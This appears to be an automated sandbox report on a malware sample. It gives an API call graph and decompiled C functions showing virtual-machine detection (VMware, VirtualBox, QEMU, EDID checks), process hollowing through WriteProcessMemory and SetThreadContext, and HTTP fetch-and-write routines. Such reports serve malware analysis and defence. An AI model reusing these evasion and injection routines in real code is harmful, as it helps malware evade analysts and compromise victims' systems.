2b52b0f PathAppendW 7035->7038 7036 2b53c33 5 API calls 7037 2b5142e 7036->7037 7037->6882 7054 2b522f0 7037->7054 7039 2b52b2b 7038->7039 7040 2b52b5a StrCatW PathFileExistsW 7039->7040 7040->7039 7041 2b52b7b 7040->7041 7042 2b52b8d CreateDirectoryW PathFileExistsW 7041->7042 7042->7043 7044 2b52bae 7042->7044 7043->7036 7045 2b52bd6 PathAppendW DeleteFileW CreateFileW 7044->7045 7045->7043 7046 2b52c12 WriteFile 7045->7046 7047 2b52c35 7046->7047 7048 2b52c3d CloseHandle 7046->7048 7047->7048 7049 2b52c48 GetLongPathNameW 7047->7049 7048->7043 7171 2b52c9c 7049->7171 7052 2b52c82 CloseHandle 7052->7043 7053 2b52c7f 7053->7052 7055 2b52337 
7054->7055 7173 2b52730 7055->7173 7058 2b526f5 7061 2b52709 7058->7061 7062 2b526f9 GetProcessHeap HeapFree 7058->7062 7059 2b526e8 TerminateProcess 7059->7058 7060 2b523a1 GetProcessHeap HeapAlloc 7063 2b523c7 7060->7063 7076 2b52359 7060->7076 7064 2b5271d 7061->7064 7065 2b5270d GetProcessHeap HeapFree 7061->7065 7062->7061 7068 2b523d6 StrCatW 7063->7068 7066 2b53c33 5 API calls 7064->7066 7065->7064 7067 2b5272c 7066->7067 7067->6882 7069 2b523ff CreateProcessW 7068->7069 7070 2b523e8 StrCatW StrCatW 7068->7070 7071 2b52429 GetThreadContext 7069->7071 7069->7076 7070->7069 7072 2b5244a 7071->7072 7071->7076 7073 2b5248a GetProcessHeap HeapAlloc 7072->7073 7072->7076 7074 2b524c3 VirtualQueryEx 7073->7074 7075 2b524f1 7074->7075 7075->7074 7075->7076 7077 2b52513 WriteProcessMemory 7075->7077 7076->7058 7076->7059 7077->7076 7079 2b52575 ReadProcessMemory 7077->7079 7079->7076 7080 2b52595 7079->7080 7080->7076 7081 2b525c8 VirtualAllocEx 7080->7081 7081->7076 7082 2b525f4 WriteProcessMemory 7081->7082 7082->7076 7083 2b52618 7082->7083 7084 2b52676 WriteProcessMemory SetThreadContext ResumeThread 7083->7084 7085 2b52638 WriteProcessMemory 7083->7085 7084->7076 7085->7085 7086 2b52670 7085->7086 7086->7084 7089 2b52166 7087->7089 7090 2b521c3 7089->7090 7117 2b51e51 7089->7117 7143 2b51cc7 7089->7143 7092 2b53c33 5 API calls 7090->7092 7093 2b521d5 7092->7093 7093->7010 7095 2b53a4a 7094->7095 7096 2b53a82 InternetCrackUrlW 7095->7096 7097 2b53b2a 7096->7097 7098 2b53af6 7096->7098 7099 2b53c33 5 API calls 7097->7099 7098->7097 7158 2b53905 InternetOpenW 7098->7158 7101 2b53b3b 7099->7101 7101->7019 7103 2b529b2 10 API calls 7102->7103 7106 2b53b72 7103->7106 7104 2b53c20 7107 2b53c33 5 API calls 7104->7107 7105 2b53c10 GetProcessHeap HeapFree 7105->7104 7108 2b51cc7 5 API calls 7106->7108 7110 2b53bfd 7106->7110 7109 2b53c2f 7107->7109 7111 2b53bad 7108->7111 7109->7010 7110->7104 7110->7105 7111->7110 7112 2b53bb2 DeleteFileW CreateFileW 7111->7112 
7112->7110 7113 2b53bda WriteFile 7112->7113 7114 2b53bf1 7113->7114 7115 2b53c02 CloseHandle 7113->7115 7114->7115 7116 2b53bf6 CloseHandle 7114->7116 7115->7110 7116->7110 7118 2b51e5e 7117->7118 7119 2b51eaa InternetCrackUrlW 7118->7119 7120 2b51f2f 7119->7120 7121 2b520f7 7119->7121 7120->7121 7122 2b51f45 InternetOpenW 7120->7122 7124 2b5210e 7121->7124 7125 2b5210b InternetCloseHandle 7121->7125 7122->7121 7123 2b51f79 InternetConnectW 7122->7123 7123->7121 7126 2b51faf 7123->7126 7127 2b52118 InternetCloseHandle 7124->7127 7128 2b5211b 7124->7128 7125->7124 7131 2b51fcd HttpOpenRequestW 7126->7131 7127->7128 7129 2b52125 InternetCloseHandle 7128->7129 7130 2b52128 7128->7130 7129->7130 7132 2b53c33 5 API calls 7130->7132 7148 2b514d8 7131->7148 7134 2b52137 7132->7134 7134->7089 7136 2b52003 HttpOpenRequestW InternetSetOptionW InternetSetOptionW wsprintfW HttpAddRequestHeadersW 7136->7121 7137 2b5208e 7136->7137 7138 2b514d8 3 API calls 7137->7138 7139 2b52095 7138->7139 7139->7121 7140 2b52099 InternetReadFile 7139->7140 7141 2b520ce InternetReadFile 7140->7141 7141->7121 7142 2b520c4 7141->7142 7142->7121 7142->7141 7154 2b51c0f 7143->7154 7145 2b51cf2 7146 2b53c33 5 API calls 7145->7146 7147 2b51d99 7146->7147 7147->7089 7149 2b514f5 7148->7149 7150 2b5155b 7148->7150 7149->7150 7151 2b514fc HttpSendRequestW 7149->7151 7150->7121 7150->7136 7152 2b51511 HttpQueryInfoW 7151->7152 7153 2b5154e Sleep 7151->7153 7152->7149 7152->7153 7153->7149 7155 2b51c4d 7154->7155 7156 2b53c33 5 API calls 7155->7156 7157 2b51cc3 7156->7157 7157->7145 7159 2b53a34 7158->7159 7160 2b5394a InternetConnectW 7158->7160 7159->7097 7161 2b53973 HttpOpenRequestW 7160->7161 7162 2b53a2f InternetCloseHandle 7160->7162 7163 2b53a2a InternetCloseHandle 7161->7163 7164 2b539aa 7161->7164 7162->7159 7163->7162 7165 2b539dd HttpSendRequestW 7164->7165 7166 2b539af InternetQueryOptionW InternetSetOptionW 7164->7166 7167 2b539f6 HttpQueryInfoW 7165->7167 7168 2b539ee GetLastError 
7165->7168 7166->7165 7169 2b53a27 InternetCloseHandle 7167->7169 7170 2b53a1b 7167->7170 7168->7169 7169->7163 7170->7169 7172 2b52c74 PathFileExistsW 7171->7172 7172->7052 7172->7053 7174 2b52781 GetSystemDirectoryA 7173->7174 7176 2b5274c 7173->7176 7175 2b527a4 GetModuleHandleW GetProcAddress 7174->7175 7183 2b52779 7174->7183 7177 2b527e1 7175->7177 7178 2b527d1 GetCurrentProcess 7175->7178 7176->7174 7176->7183 7179 2b527e9 7177->7179 7181 2b52816 PathAppendA 7177->7181 7178->7177 7180 2b52828 7 API calls 7179->7180 7180->7183 7181->7180 7182 2b53c33 5 API calls 7184 2b52355 7182->7184 7183->7182 7184->7060 7184->7076 7429 407219 SetUnhandledExceptionFilter 7680 40c6f9 7681 40c70a 7680->7681 7684 40c712 7680->7684 7682 40c70f CloseHandle 7681->7682 7681->7684 7682->7684 7683 40c724 7684->7683 7685 40c721 CloseHandle 7684->7685 7685->7683 7433 40ac3b 7434 407c87 __calloc_crt 8 API calls 7433->7434 7435 40ac45 7434->7435 7438 4063cc TlsGetValue 7435->7438 7439 406400 GetModuleHandleA 7438->7439 7440 4063df 7438->7440 7442 406411 7439->7442 7443 4063f8 7439->7443 7440->7439 7441 4063e9 TlsGetValue 7440->7441 7445 4063f4 7441->7445 7444 406360 __initp_misc_cfltcvt_tab 6 API calls 7442->7444 7446 406416 7444->7446 7445->7439 7445->7443 7446->7443 7447 40641a GetProcAddress 7446->7447 7447->7443 7452 40acdc 7453 40acdf 7452->7453 7456 40c52a 7453->7456 7457 40c54f 7456->7457 7460 40c556 7456->7460 7468 406ce5 7457->7468 7502 40ad4f 7460->7502 7462 40c567 _memset 7463 40c615 7462->7463 7466 40c5ea SetUnhandledExceptionFilter UnhandledExceptionFilter 7462->7466 7522 406c6a 7463->7522 7466->7463 7469 406cf1 7468->7469 7501 406e47 7469->7501 7525 40b0dd 7469->7525 7471 406d11 7472 406e4c GetStdHandle 7471->7472 7474 40b0dd __FF_MSGBANNER 6 API calls 7471->7474 7473 406e5a _strlen 7472->7473 7472->7501 7477 406e74 WriteFile 7473->7477 7473->7501 7475 406d22 7474->7475 7475->7472 7476 406d34 7475->7476 7476->7501 7532 40a659 7476->7532 7477->7501 7480 406d6a 
GetModuleFileNameA 7482 406d88 7480->7482 7486 406dab _strlen 7480->7486 7484 40a659 _strcpy_s 6 API calls 7482->7484 7483 406d67 7483->7480 7485 406d98 7484->7485 7485->7486 7487 405700 __invoke_watson 5 API calls 7485->7487 7498 406dee 7486->7498 7547 40a5a6 7486->7547 7487->7486 7492 40a4e5 _strcat_s 6 API calls 7497 406e23 7492->7497 7493 405700 __invoke_watson 5 API calls 7495 406e12 7493->7495 7494 405700 __invoke_watson 5 API calls 7494->7498 7495->7492 7496 406e34 7565 40af20 7496->7565 7497->7496 7499 405700 __invoke_watson 5 API calls 7497->7499 7556 40a4e5 7498->7556 7499->7496 7501->7460 7503 406443 __amsg_exit 6 API calls 7502->7503 7504 40ad5a 7503->7504 7504->7462 7505 40ad5c 7504->7505 7508 40ad68 __freefls@4 7505->7508 7506 40adc4 7507 40ada5 7506->7507 7511 40add3 7506->7511 7512 406443 __amsg_exit 6 API calls 7507->7512 7508->7506 7508->7507 7509 40ad8f 7508->7509 7514 40ad8b 7508->7514 7614 4065e8 GetLastError 7509->7614 7513 403ce9 __lseeki64 VirtualAlloc 7511->7513 7515 40ad94 _siglookup 7512->7515 7516 40add8 7513->7516 7514->7509 7514->7511 7518 40ad9d _raise __freefls@4 7515->7518 7519 40ae3a __freefls@4 7515->7519 7520 406c6a _abort 13 API calls 7515->7520 7517 4057fc __lseeki64 6 API calls 7516->7517 7517->7518 7518->7462 7519->7518 7521 40643a _raise 10 API calls 7519->7521 7520->7519 7521->7518 7657 406b77 7522->7657 7524 406c77 7526 40b0e8 7525->7526 7527 40b0f2 7526->7527 7528 403ce9 __lseeki64 VirtualAlloc 7526->7528 7527->7471 7529 40b10b 7528->7529 7530 4057fc __lseeki64 6 API calls 7529->7530 7531 40b11b 7530->7531 7531->7471 7533 40a666 7532->7533 7534 40a66e 7532->7534 7533->7534 7539 40a695 7533->7539 7535 403ce9 __lseeki64 VirtualAlloc 7534->7535 7536 40a673 7535->7536 7537 4057fc __lseeki64 6 API calls 7536->7537 7538 406d56 7537->7538 7538->7480 7541 405700 7538->7541 7539->7538 7540 403ce9 __lseeki64 VirtualAlloc 7539->7540 7540->7536 7602 409280 7541->7602 7543 405791 IsDebuggerPresent SetUnhandledExceptionFilter 
UnhandledExceptionFilter 7544 4057d4 GetCurrentProcess TerminateProcess 7543->7544 7545 4057c8 __invoke_watson 7543->7545 7546 4057f4 setSBUpLow 7544->7546 7545->7544 7546->7483 7551 40a5b6 7547->7551 7548 40a5ba 7549 403ce9 __lseeki64 VirtualAlloc 7548->7549 7550 406ddb 7548->7550 7555 40a5d6 7549->7555 7550->7494 7550->7498 7551->7548 7551->7550 7553 40a600 7551->7553 7552 4057fc __lseeki64 6 API calls 7552->7550 7553->7550 7554 403ce9 __lseeki64 VirtualAlloc 7553->7554 7554->7555 7555->7552 7557 40a4f2 7556->7557 7558 40a4fa 7556->7558 7557->7558 7563 40a52f 7557->7563 7559 403ce9 __lseeki64 VirtualAlloc 7558->7559 7560 40a4ff 7559->7560 7561 4057fc __lseeki64 6 API calls 7560->7561 7562 406e01 7561->7562 7562->7493 7562->7495 7563->7562 7564 403ce9 __lseeki64 VirtualAlloc 7563->7564 7564->7560 7604 40643a 7565->7604 7568 40af48 LoadLibraryA 7569 40b0c1 7568->7569 7570 40af5d GetProcAddress 7568->7570 7569->7501 7570->7569 7573 40af73 7570->7573 7571 40aff0 7572 40b07b 7571->7572 7576 406443 __amsg_exit 6 API calls 7571->7576 7574 406443 __amsg_exit 6 API calls 7572->7574 7601 40b060 7572->7601 7575 4063cc __initp_misc_cfltcvt_tab 10 API calls 7573->7575 7585 40b08b 7574->7585 7578 40af79 GetProcAddress 7575->7578 7579 40b010 7576->7579 7577 406443 __amsg_exit 6 API calls 7577->7569 7580 4063cc __initp_misc_cfltcvt_tab 10 API calls 7578->7580 7581 406443 __amsg_exit 6 API calls 7579->7581 7582 40af8e GetProcAddress 7580->7582 7587 40b01d 7581->7587 7583 4063cc __initp_misc_cfltcvt_tab 10 API calls 7582->7583 7584 40afa3 7583->7584 7607 406a72 7584->7607 7588 406443 __amsg_exit 6 API calls 7585->7588 7585->7601 7587->7572 7590 40b048 7587->7590 7588->7601 7589 40afb1 7591 40afc1 7589->7591 7594 405700 __invoke_watson 5 API calls 7589->7594 7593 406aa9 __initp_misc_cfltcvt_tab 6 API calls 7590->7593 7591->7571 7592 40afca GetProcAddress 7591->7592 7595 4063cc __initp_misc_cfltcvt_tab 10 API calls 7592->7595 7596 40b051 7593->7596 7594->7591 7597 40afd8 7595->7597 
7599 405700 __invoke_watson 5 API calls 7596->7599 7596->7601 7597->7571 7598 40afe2 GetProcAddress 7597->7598 7600 4063cc __initp_misc_cfltcvt_tab 10 API calls 7598->7600 7599->7601 7600->7571 7601->7577 7603 40928c __VEC_memzero 7602->7603 7603->7543 7605 4063cc __initp_misc_cfltcvt_tab 10 API calls 7604->7605 7606 406441 7605->7606 7606->7568 7606->7571 7608 406a7d 7607->7608 7609 403ce9 __lseeki64 VirtualAlloc 7608->7609 7610 406aa3 7608->7610 7611 406a82 7609->7611 7610->7589 7612 4057fc __lseeki64 6 API calls 7611->7612 7613 406a92 7612->7613 7613->7589 7628 4064ba TlsGetValue 7614->7628 7617 406653 SetLastError 7617->7515 7618 407c87 __calloc_crt 8 API calls 7619 406611 7618->7619 7619->7617 7620 406443 __amsg_exit 6 API calls 7619->7620 7621 40662b 7620->7621 7622 406632 7621->7622 7623 40664a 7621->7623 7633 406529 7622->7633 7625 403199 ___free_lc_time 4 API calls 7623->7625 7627 406650 7625->7627 7626 40663a GetCurrentThreadId 7626->7617 7627->7617 7629 4064e8 7628->7629 7630 4064cd 7628->7630 7629->7617 7629->7618 7631 406443 __amsg_exit 6 API calls 7630->7631 7632 4064d8 TlsSetValue 7631->7632 7632->7629 7644 404a88 7633->7644 7635 406535 GetModuleHandleA 7636 406586 InterlockedIncrement 7635->7636 7637 406557 7635->7637 7640 4065ad __freefls@4 7636->7640 7638 406360 __initp_misc_cfltcvt_tab 6 API calls 7637->7638 7639 40655c 7638->7639 7639->7636 7641 406560 GetProcAddress GetProcAddress 7639->7641 7645 40619a InterlockedIncrement 7640->7645 7641->7636 7643 4065cc _raise __freefls@4 7643->7626 7644->7635 7646 4061b5 InterlockedIncrement 7645->7646 7647 4061b8 7645->7647 7646->7647 7648 4061c2 InterlockedIncrement 7647->7648 7649 4061c5 7647->7649 7648->7649 7650 4061d2 7649->7650 7651 4061cf InterlockedIncrement 7649->7651 7652 4061dc InterlockedIncrement 7650->7652 7654 4061df 7650->7654 7651->7650 7652->7654 7653 4061f4 InterlockedIncrement 7653->7654 7654->7653 7655 406204 InterlockedIncrement 7654->7655 7656 40620d InterlockedIncrement 7654->7656 
7655->7654 7656->7643 7658 406b83 __freefls@4 7657->7658 7659 406443 __amsg_exit 6 API calls 7658->7659 7664 406bf9 _abort __freefls@4 7658->7664 7660 406bb9 7659->7660 7662 406443 __amsg_exit 6 API calls 7660->7662 7661 406c41 __freefls@4 7661->7524 7665 406bc7 7662->7665 7664->7661 7668 406a13 7664->7668 7665->7664 7666 40643a _raise 10 API calls 7665->7666 7667 406443 __amsg_exit 6 API calls 7665->7667 7666->7665 7667->7665 7671 4069ed GetModuleHandleA 7668->7671 7672 406a0c ExitProcess 7671->7672 7673 4069fc GetProcAddress 7671->7673 7673->7672 8177 40395c 8178 403969 8177->8178 8179 406e85 __FF_MSGBANNER 24 API calls 8177->8179 8180 406ce5 __amsg_exit 24 API calls 8178->8180 8179->8178 8181 403972 8180->8181 8182 406a13 _malloc 3 API calls 8181->8182 8183 40397c 8182->8183 8318 4071dc 8319 407214 8318->8319 8320 4071ea 8318->8320 8320->8319 8322 40acb8 8320->8322 8323 40acc4 __freefls@4 8322->8323 8324 40665f _LocaleUpdate::_LocaleUpdate 46 API calls 8323->8324 8325 40acc9 8324->8325 8326 40c52a _abort 51 API calls 8325->8326 8327 40aceb __freefls@4 8326->8327 8327->8319 7430 407c1f 7431 407c2b SetLastError 7430->7431 7432 407c33 __freefls@4 7430->7432 7431->7432

Executed Functions

Control-flow Graph

C-Code - Quality: 88%
E02B5372C(void* __edi, void* __esi, void* __eflags, short _a4) {
	WCHAR* _v0;
	signed int _v8;
	void _v12;
	long _v16;
	long _v20;
	void _v24;
	intOrPtr _v28;
	long _v32;
	void* _v36;
	void* _v40;
	WCHAR* _v48;
	char _v704;
	char _v708;
	short _v2108;
	WCHAR* _v2120;
	WCHAR* _v2124;
	WCHAR* _v2128;
	WCHAR* _v2132;
	intOrPtr _v2136;
	WCHAR* _v2140;
	void* _v2148;
	WCHAR* _v2152;
	char* _v2156;
	void* __ebx;
	signed int _t55;
	intOrPtr _t61;
	intOrPtr _t65;
	void* _t67;
	WCHAR* _t120;
	intOrPtr* _t124;
	intOrPtr* _t126;
	intOrPtr _t128;
	void* _t130;
	void* _t134;
	WCHAR* _t135;
	void* _t140;
	WCHAR* _t142;
	signed int _t147;

	_t55 =  *0x2b56004; // 0xbb40e64e
	_v8 = _t55 ^ _t147;
	 *0x2b593a8 = 0; // executed
	E02B533DB(0, __edi, __esi); // executed
	if( *0x2b59474 != 0) {
		lstrcpyA( &_v708, "(1):");
		E02B5355B(0,  &_v704, __edi, __esi);
		_t124 =  &_v708;
		_t134 = _t124 + 1;
		do {
			_t61 =  *_t124;
			_t124 = _t124 + 1;
		} while (_t61 != 0);
		MultiByteToWideChar(0, 0,  &_v708, _t124 - _t134,  &_v2108, 0x104);
		_t126 =  &_v708;
		_t135 = _t126 + 1;
		do {
			_t65 =  *_t126;
			_t126 = _t126 + 1;
		} while (_t65 != 0);
		_t128 = _t126 - _t135 + _t126 - _t135;
		if(_t128 >= 0x578) {
			E02B53D67();
			asm("int3");
			_push(_t147);
			_push(0);
			_push(__esi);
			_t142 = 0;
			_v2156 = L"text/*";
			_push(__edi);
			_v2124 = 0;
			_t120 = _t135;
			_v2136 = _t128;
			_v2140 = 0;
			_v2120 = 0;
			_v2132 = 0;
			_v2128 = 0;
			_v2152 = 0;
			_t67 = InternetOpenW(L"Mozilla / 5.0 (SymbianOS / 9.1; U; [en]; SymbianOS / 91 Series60 / 3.0) AppleWebkit / 413 (KHTML, like Gecko) Safari / 413", 0, 0, 0, 0);
			_v2148 = _t67;
			if(_t67 != 0) {
				_t130 = InternetConnectW(_t67, _t120, _a4, 0x2b542bc, 0x2b542bc, 3, 0, 0);
				_v36 = _t130;
				if(_t130 != 0) {
					_t72 =  !=  ? 0x84803000 : 0x84003000;
					_v12 =  !=  ? 0x84803000 : 0x84003000;
					_t140 = HttpOpenRequestW(_t130, L"GET", _v0, L"HTTP/1.1", 0,  &_v48, 0x84003000, 0);
					if(_t140 != 0) {
						if(_v28 != 0) {
							_v16 = 4;
							InternetQueryOptionW(_t140, 0x1f,  &_v12,  &_v16);
							_v12 = _v12 | 0x00000080;
							InternetSetOptionW(_t140, 0x1f,  &_v12, 4);
						}
						_t142 = HttpSendRequestW(_t140, _t142, _t142, _t142, _t142);
						if(_t142 != 0) {
							_v20 = 4;
							_t142 = HttpQueryInfoW(_t140, 0x20000013,  &_v24,  &_v20,  &_v32);
							if(_t142 != 0) {
								_t142 =  !=  ? 0 : _t142;
							}
						} else {
							GetLastError();
						}
						InternetCloseHandle(_t140);
					}
					InternetCloseHandle(_v36);
				}
				InternetCloseHandle(_v40);
			}
			return _t142;
		} else {
			_push(__esi);
			 *((short*)(_t147 + _t128 - 0x838)) = 0;
			if(StrStrIW( &_v2108, L"VMware") == 0 && StrStrIW( &_v2108, L"VirtualBox") == 0 && StrStrIW( &_v2108, L"VBox") == 0 && StrStrIW( &_v2108, L"QEMU") == 0 && StrStrIW( &_v2108, L"Western Disk") == 0 && StrStrIW( &_v2108, L" HARDDISK") == 0) {
				lstrcpyA( &_v708, "(2):");
				E02B52E5C(0,  &_v704, __edi, StrStrIW);
				if(StrStrIA( &_v708, "VMware") != 0 || StrStrIA( &_v708, "VirtualBox") != 0 || StrStrIA( &_v708, "VBox") != 0 || StrStrIA( &_v708, "QEMU") != 0 || StrStrIA( &_v708, "Display Adapter") != 0 && StrStrIA( &_v708, "Non-PnP") != 0) {
					goto L19;
				}
			}
			goto L21;
		}
	} else {
		L21:
		return E02B53C33(_v8 ^ _t147);
	}
}

                                              APIs
                                                • Part of subcall function 02B533DB: RegOpenKeyExW.KERNELBASE(80000002,SYSTEM\ControlSet001\Enum\DISPLAY,00000000,00000009,?), ref: 02B53405
                                                • Part of subcall function 02B533DB: RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 02B53442
                                                • Part of subcall function 02B533DB: RegCloseKey.ADVAPI32(?), ref: 02B53546
                                              • lstrcpyA.KERNEL32(?,(1):), ref: 02B53767
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000104), ref: 02B537A0
                                              • StrStrIW.SHLWAPI(?,VMware), ref: 02B537E3
                                              • StrStrIW.SHLWAPI(?,VirtualBox), ref: 02B537F9
                                              • StrStrIW.SHLWAPI(?,VBox), ref: 02B5380F
                                              • StrStrIW.SHLWAPI(?,QEMU), ref: 02B53825
                                              • StrStrIW.SHLWAPI(?,Western Disk), ref: 02B5383B
                                              • StrStrIW.SHLWAPI(?, HARDDISK), ref: 02B53851
                                              • lstrcpyA.KERNEL32(?,(2):), ref: 02B53867
                                              • StrStrIA.SHLWAPI(?,VMware), ref: 02B5388A
                                              • StrStrIA.SHLWAPI(?,VirtualBox), ref: 02B5389C
                                              • StrStrIA.SHLWAPI(?,VBox), ref: 02B538AE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true
                                              • Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: lstrcpy$ByteCharCloseInfoMultiOpenQueryWide
                                              • String ID: HARDDISK$(1):$(2):$Display Adapter$Non-PnP$QEMU$QEMU$VBox$VBox$VMware$VMware$VirtualBox$VirtualBox$Western Disk
                                              • API String ID: 1860444428-2002398593
                                              • Opcode ID: c56404748d35d231faca52375ce520f55a45932a12c8f683e8483b51a7c86c6b
                                              • Instruction ID: 7f9a5c09d5d497de349f2ca76c884c7a9fa4cd0a04b8062efd1815e68d050abe
                                              • Opcode Fuzzy Hash: c56404748d35d231faca52375ce520f55a45932a12c8f683e8483b51a7c86c6b
                                              • Instruction Fuzzy Hash: F4414F70D41339DAEF14EAA0DC94FAD77FCAF04A84F0444E5AD06DB100EB79A6859FA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              C-Code - Quality: 90%
                                              			E02B5308A(void* __ebx, short* __ecx, void* __edi, void* __esi) {
                                              				signed int _v8;
                                              				char _v208;
                                              				char _v408;
                                              				char _v1295;
                                              				void* _v1300;
                                              				char _v1313;
                                              				void* _v1318;
                                              				char _v1331;
                                              				void* _v1336;
                                              				char _v1349;
                                              				void* _v1354;
                                              				intOrPtr _v1404;
                                              				char _v1408;
                                              				short _v1920;
                                              				char _v2120;
                                              				short _v2632;
                                              				void* _v2636;
                                              				int _v2640;
                                              				void* _v2644;
                                              				int* _v2648;
                                              				int _v2652;
                                              				int _v2656;
                                              				short* _v2660;
                                              				int _v2664;
                                              				int _v2668;
                                              				int _v2672;
                                              				int _v2676;
                                              				signed int _t70;
                                              				long _t73;
                                              				int _t82;
                                              				long _t94;
                                              				long _t99;
                                              				long _t110;
                                              				char _t120;
                                              				CHAR* _t123;
                                              				long _t127;
                                              				intOrPtr _t129;
                                              				void* _t135;
                                              				CHAR* _t149;
                                              				char _t154;
                                              				void* _t156;
                                              				void* _t159;
                                              				signed int _t161;
                                              
                                              				_t70 =  *0x2b56004; // 0xbb40e64e
                                              				_v8 = _t70 ^ _t161;
                                              				_v2640 = 0x3e8;
                                              				_v2660 = __ecx;
                                              				_v2648 = 0;
                                              				_t73 = RegOpenKeyExW(0x80000002, __ecx, 0, 9,  &_v2644); // executed
                                              				if(_t73 != 0 || RegQueryInfoKeyW(_v2644, 0, 0, 0,  &_v2656,  &_v2676, 0,  &_v2672,  &_v2668,  &_v2664, 0, 0) != 0) {
                                              					L23:
                                              					return E02B53C33(_v8 ^ _t161);
                                              				} else {
                                              					_t82 = _v2656 - 1;
                                              					_push(__edi);
                                              					_t156 = RegCloseKey;
                                              					_v2652 = _t82;
                                              					if(_t82 < 0) {
                                              						L22:
                                              						RegCloseKey(_v2644); // executed
                                              						goto L23;
                                              					}
                                              					_t135 = lstrcatA;
                                              					_push(__esi);
                                              					_t159 = lstrcpyA;
                                              					do {
                                              						_v2632 = 0;
                                              						RegEnumKeyW(_v2644, _t82,  &_v2632, 0x100); // executed
                                              						_v1920 = 0;
                                              						E02B52C9C( &_v1920, _v2660);
                                              						StrCatW( &_v1920, "\\");
                                              						StrCatW( &_v1920,  &_v2632);
                                              						_t94 = RegOpenKeyExW(0x80000002,  &_v1920, 0, 9,  &_v2636); // executed
                                              						if(_t94 == 0) {
                                              							_v2640 = 0x3e8;
                                              							_v1408 = 0;
                                              							_t127 = RegQueryValueExA(_v2636, "Driver", 0, 0,  &_v1408,  &_v2640); // executed
                                              							if(_t127 == 0) {
                                              								RegCloseKey(_v2636); // executed
                                              								_t129 = E02B52FD4(_t135,  &_v1408, _t156, _t159); // executed
                                              								_v2648 = _t129;
                                              								lstrcpyA( &_v2120,  &_v1408);
                                              							}
                                              						}
                                              						StrCatW( &_v1920, L"\\Device Parameters");
                                              						_t99 = RegOpenKeyExW(0x80000002,  &_v1920, 0, 9,  &_v2636); // executed
                                              						if(_t99 == 0) {
                                              							_v2640 = 0x3e8;
                                              							_v1408 = 0;
                                              							_t110 = RegQueryValueExW(_v2636, L"EDID", 0, 0,  &_v1408,  &_v2640); // executed
                                              							if(_t110 != 0 || _v1408 != 0xffffff00 || _v1404 != 0xffffff) {
                                              								lstrcpyA( &_v208, "No EDID!");
                                              								goto L20;
                                              							} else {
                                              								 *0x2b59474 =  *0x2b59474 + 1;
                                              								RegCloseKey(_v2636);
                                              								_t154 = 0;
                                              								_t115 =  !=  ? _t154 :  &_v1349;
                                              								_t147 =  !=  ?  !=  ? _t154 :  &_v1349 :  &_v1331;
                                              								_t117 =  !=  ?  !=  ?  !=  ? _t154 :  &_v1349 :  &_v1331 :  &_v1313;
                                              								_t149 =  !=  ?  !=  ?  !=  ?  !=  ? _t154 :  &_v1349 :  &_v1331 :  &_v1313 :  &_v1295;
                                              								if(_t149 == 0) {
                                              									lstrcpyA( &_v208, "BAD EDID!");
                                              									 *0x2b59474 =  *0x2b59474 + 1;
                                              									goto L20;
                                              								}
                                              								_t120 = _t154;
                                              								if( *_t149 == 0xa) {
                                              									L14:
                                              									 *((char*)(_t120 + _t149)) = _t154;
                                              									lstrcpyA( &_v208, _t149);
                                              									_t123 =  &_v208;
                                              									if(_v2648 == 0) {
                                              										_push("(NotActive)");
                                              									} else {
                                              										_push("(IsActive)");
                                              									}
                                              									lstrcatA(_t123, ??);
                                              									goto L20;
                                              								} else {
                                              									goto L13;
                                              								}
                                              								do {
                                              									L13:
                                              									_t120 = _t120 + 1;
                                              								} while ( *((char*)(_t120 + _t149)) != 0xa);
                                              								goto L14;
                                              							}
                                              						}
                                              						L20:
                                              						_v408 = 0;
                                              						lstrcatA( &_v408, "--Nm:");
                                              						lstrcatA( &_v408,  &_v208);
                                              						E02B52D16(0x2b593a8,  &_v408, 0xc8);
                                              						_t82 = _v2652 - 1;
                                              						_v2652 = _t82;
                                              					} while (_t82 >= 0);
                                              					goto L22;
                                              				}
                                              			}

                                              APIs
                                              • RegOpenKeyExW.KERNELBASE(80000002,?,00000000,00000009,?,00000000), ref: 02B530C8
                                              • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 02B53105
                                              • RegEnumKeyW.ADVAPI32(?,?,?,00000100), ref: 02B53158
                                              • StrCatW.SHLWAPI(?,02B54480), ref: 02B53184
                                              • StrCatW.SHLWAPI(?,?), ref: 02B53198
                                              • RegOpenKeyExW.KERNELBASE(80000002,?,00000000,00000009,?), ref: 02B531B5
                                              • RegQueryValueExA.KERNELBASE(?,Driver,00000000,00000000,?,000003E8), ref: 02B531EC
                                              • RegCloseKey.KERNELBASE(?), ref: 02B531FC
                                                • Part of subcall function 02B52FD4: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000000), ref: 02B5306A
                                              • lstrcpyA.KERNEL32(?,?), ref: 02B5321D
                                              • StrCatW.SHLWAPI(?,\Device Parameters), ref: 02B5322B
                                              • RegOpenKeyExW.KERNELBASE(80000002,?,00000000,00000009,?), ref: 02B53248
                                              • RegQueryValueExW.KERNELBASE(?,EDID,00000000,00000000,?,000003E8), ref: 02B53283
                                              • RegCloseKey.ADVAPI32(?), ref: 02B532BD
                                              • lstrcpyA.KERNEL32(?,?), ref: 02B5332B
                                              • lstrcatA.KERNEL32(?,(NotActive)), ref: 02B53349
                                              • lstrcpyA.KERNEL32(?,BAD EDID!), ref: 02B53359
                                              • lstrcpyA.KERNEL32(?,No EDID!), ref: 02B5336F
                                              • lstrcatA.KERNEL32(?,--Nm:), ref: 02B53385
                                              • lstrcatA.KERNEL32(?,?), ref: 02B53395
                                              • RegCloseKey.KERNELBASE(?), ref: 02B533C9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true
                                              • Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmp
